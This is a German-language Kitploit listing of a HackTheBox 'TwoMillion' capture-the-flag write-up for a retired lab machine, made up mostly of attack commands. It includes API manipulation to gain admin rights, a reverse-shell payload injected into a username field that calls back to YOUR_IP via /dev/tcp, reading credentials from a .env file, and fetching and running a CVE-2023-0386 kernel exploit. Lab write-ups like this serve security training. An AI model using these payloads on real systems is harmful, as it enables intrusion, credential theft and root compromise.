Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HTB-TwoMillion-Writeup — HackTheBox TwoMillion Maschinen-Writeup — API-Missbrauch, Befehlseinschleusung und CVE-2023-0386 | Kitploit
Tools/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
Privilege EscalationAufklärungSchwachstellenanalyseExploitationLaterale BewegungWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstests

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Command and Control
Lernen & Bildung
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

HackTheBox TwoMillion Maschinen-Writeup — API-Missbrauch, Befehlseinschleusung und CVE-2023-0386

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

HTB-TwoMillion-Writeup

HackTheBox TwoMillion Maschinen-Writeup — API-Missbrauch, Befehlsinjektion & CVE-2023-0386

HackTheBox — TwoMillion Writeup

HackTheBox — TwoMillion Writeup

HTB Difficulty OS

Maschineninfo

FeldDetails
NameTwoMillion
SchwierigkeitEasy
OSLinux
IP10.10.11.221
CVECVE-2023-0386

Zusammenfassung

TwoMillion ist eine einfache Linux-Maschine, die sich um die alte HackTheBox-Plattform dreht. Sie umfasst das Dekodieren eines Einladungscodes, das Missbrauchen von API-Endpunkten, OS-Befehlsinjektion, das Auffinden von Anmeldeinformationen und eine Linux-Kernel-Privilegienausweitung via CVE-2023-0386 (OverlayFS).


Aufklärung

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

Offene Ports:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → leitet auf 2million.htb weiter

Zu /etc/hosts hinzufügen:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

Schritt 1 — Einladungscode

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

Antwort ist ROT13-kodiert. Dekodieren:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Einladungscode generieren:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

Registrieren unter http://2million.htb/register mit dem dekodierten Einladungscode.


Schritt 2 — API-Missbrauch → Admin

Einloggen über Browser, PHPSESSID aus Cookies holen (F12 → Anwendung → Cookies).

Zum Admin eskalieren:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

Überprüfen:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

Schritt 3 — Befehlsinjektion → Reverse Shell

Listener starten:

root@kitploit:~
nc -lvnp 4444

Reverse-Shell-Payload senden:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

Shell als www-data empfangen.


Schritt 4 — User-Flag

Anmeldeinformationen in .env finden:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

SSH einloggen:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

Schritt 5 — Root-Flag (CVE-2023-0386)

Hinweis prüfen:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — anfällig für CVE-2023-0386

Exploit auf Kali herunterladen und kompilieren:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

Auf das Ziel übertragen:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Ziel
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

In zwei Terminals auf dem Ziel ausführen:

Terminal 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Terminal 2:

root@kitploit:~
./exp

Root-Flag holen:

root@kitploit:~
cat /root/root.txt

Angriffskette


Verwendete Werkzeuge

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

Dieser Writeup dient nur zu Bildungszwecken auf einer ausgemusterten HackTheBox-Maschine.

Tool herunterladen
SchrittTechnik
AufklärungNmap-Scan
EinladungscodeROT13 + Base64-Dekodierung
Web-PrivilegienausweitungAPI-Manipulation → Admin
Erste ShellOS-Befehlsinjektion
Laterale Bewegung.env-Anmeldeinformationen → SSH
RootCVE-2023-0386 OverlayFS-Exploit